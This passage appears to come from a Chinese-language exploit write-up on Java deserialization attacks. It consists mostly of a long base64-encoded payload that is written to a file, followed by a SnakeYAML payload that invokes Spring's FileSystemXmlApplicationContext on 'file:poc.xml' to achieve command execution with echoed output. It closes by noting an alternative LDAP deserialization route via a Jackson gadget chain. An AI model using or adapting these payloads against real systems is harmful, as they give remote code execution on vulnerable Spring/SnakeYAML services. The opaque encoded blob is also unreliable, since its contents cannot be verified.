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 },1048576]]写入
最后执行
yamlContent=!!org.springframework.context.support.FileSystemXmlApplicationContext [ !!java.lang.String "file:poc.xml" ]
成功将命令执行结果回显出来
还有一种方法就是打LDAP反序列化Jackson原生链